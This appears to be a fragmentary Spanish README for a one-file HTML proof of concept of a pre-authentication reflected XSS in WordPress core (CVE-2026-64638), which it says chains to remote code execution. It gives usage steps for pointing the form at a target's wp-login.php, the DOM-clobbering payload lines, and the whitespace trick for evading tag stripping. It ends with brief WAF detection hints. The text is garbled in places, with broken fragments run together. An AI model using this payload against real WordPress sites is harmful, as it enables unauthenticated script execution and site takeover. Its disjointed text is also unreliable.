
Prueba de concepto HTML de un solo archivo para XSS reflejado pre-autenticación en WordPress (CVE-2026-64638), que demuestra la ejecución de JavaScript no autenticado y una cadena XSS a RCE mediante DOM clobbering y carga de contraseñas de aplicación.
Prueba de concepto de XSS reflejado sin autenticación previa en WordPress
Prueba de concepto en un único archivo HTML para el CVE-2026-64638 (XSS2Shell), un XSS diferencial de analizador en el núcleo de WordPress. Demuestra la ejecución de JavaScript sin autenticación en el origen de WordPress mediante una solicitud de inicio de sesión manipulada.
strip_tags() vs wp_kses_post())POC.html en un editor de texto.http://TARGET/wp-login.php en la action del formulario por tu objetivo.<form id="poc" method="post" action="http://TARGET/wp-login.php">
confirm() (o alert()) en el origen de WordPress.< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=confirm&_envelope=1>
< div id=color-picker class=reset-pass-submit>
< button class="wp-generate-pw color-option">X
El espacio después de cada < es el exploit. Sin él, wp_strip_all_tags() lo elimina todo.
%3C + espacio en blanco en el campo log en el WAF/borde.POST /wp-login.php donde log contenga < codificado.